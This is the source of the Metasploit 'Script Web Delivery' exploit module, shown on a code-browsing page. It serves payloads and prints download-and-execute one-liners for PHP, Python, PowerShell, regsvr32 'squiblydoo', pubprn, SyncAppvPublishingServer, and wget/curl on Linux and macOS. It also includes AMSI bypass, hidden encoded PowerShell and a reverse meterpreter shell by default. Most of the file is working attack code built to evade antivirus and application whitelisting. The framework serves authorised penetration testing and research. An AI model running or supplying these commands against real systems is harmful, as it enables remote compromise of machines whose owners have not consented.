Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/script/web_delivery.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::Powershell

11
  include Msf::Exploit::Remote::HttpServer

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Script Web Delivery',

18
        'Description' => %q{

19
          This module quickly fires up a web server that serves a payload.

20


21
          The module will provide a command to be run on the target machine

22
          based on the selected target. The provided command will download

23
          and execute a payload using either a specified scripting language

24
          interpreter or "squiblydoo" via regsvr32.exe for bypassing

25
          application whitelisting.

26


27
          The main purpose of this module is to quickly establish a session on a

28
          target machine when the attacker has to manually type in the command:

29
          e.g. Command Injection, RDP Session, Local Access or maybe Remote

30
          Command Execution.

31


32
          This attack vector does not write to disk so it is less likely to

33
          trigger AV solutions and will allow privilege escalations supplied

34
          by Meterpreter.

35


36
          When using either of the PSH targets, ensure the payload architecture

37
          matches the target computer or use SYSWOW64 powershell.exe to execute

38
          x86 payloads on x64 machines.

39


40
          Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.

41
          The signed Microsoft binary file, Regsvr32, is able to request an .sct

42
          file and then execute the included PowerShell command inside of it.

43


44
          Similarly, the pubprn target uses the pubprn.vbs script to request and

45
          execute a .sct file.

46


47
          Both web requests (i.e., the .sct file and PowerShell download/execute)

48
          can occur on the same port.

49


50
          The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe

51
          Microsoft signed binary to request and execute a PowerShell script. This

52
          technique only works on Windows 10 builds <= 1709.

53


54
          "PSH (Binary)" will write a file to the disk, allowing for custom binaries

55
          to be served up to be downloaded and executed.

56
        },

57
        'License' => MSF_LICENSE,

58
        'Author' => [

59
          'Andrew Smith "jakx" <[email protected]>',

60
          'Ben Campbell',

61
          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!

62
          'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)

63
          'Trenton Ivey', # AppLocker MSF Module (kn0)

64
          'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features

65
          'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget

66
          'Matt Nelson', # @enigma0x3 // pubprn discovery

67
          'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass

68
          'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery

69
        ],

70
        'DefaultOptions' => {

71
          'Payload' => 'python/meterpreter/reverse_tcp',

72
          'Powershell::exec_in_place' => true

73
        },

74
        'References' => [

75
          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],

76
          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],

77
          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],

78
          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],

79
          ['URL', 'http://web.archive.org/web/20171026182440/http://subt0x10.blogspot.com:80/2017/04/bypass-application-whitelisting-script.html'],

80
          ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],

81
          ['URL', 'https://iwantmore.pizza/posts/amsi.html'],

82
          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],

83
          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'],

84
          ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],

85
        ],

86
        'Platform' => %w[python php win linux osx],

87
        'Targets' => [

88
          [

89
            'Python', {

90
              'Platform' => 'python',

91
              'Arch' => ARCH_PYTHON

92
            }

93
          ],

94
          [

95
            'PHP', {

96
              'Platform' => 'php',

97
              'Arch' => ARCH_PHP

98
            }

99
          ],

100
          [

101
            'PSH', {

102
              'Platform' => 'win',

103
              'Arch' => [ARCH_X86, ARCH_X64]

104
            }

105
          ],

106
          [

107
            'Regsvr32', {

108
              'Platform' => 'win',

109
              'Arch' => [ARCH_X86, ARCH_X64]

110
            }

111
          ],

112
          [

113
            'pubprn', {

114
              'Platform' => 'win',

115
              'Arch' => [ARCH_X86, ARCH_X64]

116
            }

117
          ],

118
          [

119
            'SyncAppvPublishingServer', {

120
              'Platform' => 'win',

121
              'Arch' => [ARCH_X86, ARCH_X64]

122
            }

123
          ],

124
          [

125
            'PSH (Binary)', {

126
              'Platform' => 'win',

127
              'Arch' => [ARCH_X86, ARCH_X64]

128
            }

129
          ],

130
          [

131
            'Linux', {

132
              'Platform' => 'linux',

133
              'Arch' => [ARCH_X86, ARCH_X64]

134
            }

135
          ],

136
          [

137
            'Mac OS X', {

138
              'Platform' => 'osx',

139
              'Arch' => [ARCH_X86, ARCH_X64]

140
            }

141
          ],

142
        ],

143
        'DefaultTarget' => 0,

144
        'DisclosureDate' => '2013-07-19',

145
        'Notes' => {

146
          'Reliability' => UNKNOWN_RELIABILITY,

147
          'Stability' => UNKNOWN_STABILITY,

148
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

149
        }

150
      )

151
    )

152


153
    register_advanced_options(

154
      [

155
        OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]),

156
        OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),

157
        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]),

158
        OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]),

159
        OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),

160
        OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),

161
        OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),

162
      ]

163
    )

164
  end

165


166
  def primer

167
    print_status('Run the following command on the target machine:')

168


169
    case target.name

170
    when 'PHP'

171
      print_line(%(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"))

172
    when 'Python'

173
      print_line(%(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());"))

174
    when 'PSH'

175
      uri = get_uri

176
      if datastore['PSH-AmsiBypass']

177
        amsi_uri = uri + amsi_bypass_uri

178
        print_line(gen_psh([amsi_uri, uri], 'string').to_s)

179
      else

180
        print_line(gen_psh(uri, 'string').to_s)

181
      end

182
    when 'pubprn'

183
      print_line(%(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct))

184
    when 'SyncAppvPublishingServer'

185
      print_line(%(SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('#{get_uri}') | IEX"))

186
    when 'Regsvr32'

187
      print_line(%(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll))

188
    when 'PSH (Binary)'

189
      psh = gen_psh(get_uri.to_s, 'download')

190
      print_line(psh.to_s)

191
    when 'Linux'

192
      fname = Rex::Text.rand_text_alphanumeric(8)

193
      print_line("wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown")

194
    when 'Mac OS X'

195
      fname = Rex::Text.rand_text_alphanumeric(8)

196
      print_line("curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown")

197
    end

198
  end

199


200
  def amsi_bypass_uri

201
    unless datastore['PSH-AmsiBypassURI'].empty?

202
      @amsi_uri = datastore['PSH-AmsiBypassURI']

203
    end

204
    @amsi_uri ||= random_uri

205
  end

206


207
  def on_request_uri(cli, request)

208
    if request.raw_uri.to_s.ends_with?('.sct')

209
      print_status('Handling .sct Request')

210
      psh = gen_psh(get_uri.to_s, 'string')

211


212
      case target.name

213
      when 'pubprn'

214
        data = gen_pubprn_sct_file(psh)

215
      when 'Regsvr32'

216
        data = gen_sct_file(psh)

217
      else

218
        print_error('Unexpected request for .sct file')

219
      end

220


221
      send_response(cli, data, 'Content-Type' => 'text/plain')

222
      return

223
    end

224


225
    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)

226
      data = bypass_powershell_protections

227
      print_status("Delivering AMSI Bypass (#{data.length} bytes)")

228
      send_response(cli, data, 'Content-Type' => 'text/plain')

229
      return

230
    end

231


232
    case target.name

233
    when 'Linux', 'Mac OS X', 'PSH (Binary)'

234
      data = generate_payload_exe

235
    when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer'

236
      data = cmd_psh_payload(

237
        payload.encoded,

238
        payload_instance.arch.first

239
      )

240
    else

241
      data = payload.encoded.to_s

242
    end

243


244
    print_status("Delivering Payload (#{data.length} bytes)")

245
    send_response(cli, data, 'Content-Type' => 'application/octet-stream')

246
  end

247


248
  def gen_psh(url, *method)

249
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

250
    force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12']

251


252
    if method.include? 'string'

253
      download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)

254
    else

255
      # Random filename to use, if there isn't anything set

256
      random = "#{rand_text_alphanumeric(8)}.exe"

257


258
      # Set filename (Use random filename if empty)

259
      filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']

260


261
      # Set path (Use %TEMP% if empty)

262
      path = datastore['PSHBinary-PATH'].blank? ? '$env:temp' : %('#{datastore['PSHBinary-PATH']}')

263


264
      # Join Path and Filename

265
      file = %(echo (#{path}+'\\#{filename}'))

266


267
      # Generate download PowerShell command

268
      download_string = Rex::Powershell::PshMethods.download_run(url, file)

269
    end

270


271
    download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}"

272


273
    # Generate main PowerShell command

274
    if datastore['PSH-EncodedCommand']

275
      download_and_run = encode_script(download_and_run)

276
      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run)

277
    end

278


279
    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)

280
  end

281


282
  def rand_class_id

283
    "#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}"

284
  end

285


286
  def gen_sct_file(command)

287
    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric(8)}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}

288
  end

289


290
  def gen_pubprn_sct_file(command)

291
    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric(8)}" classid="{#{rand_class_id}}" remotable="true"></registration><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></scriptlet>}

292
  end

293
end

294


295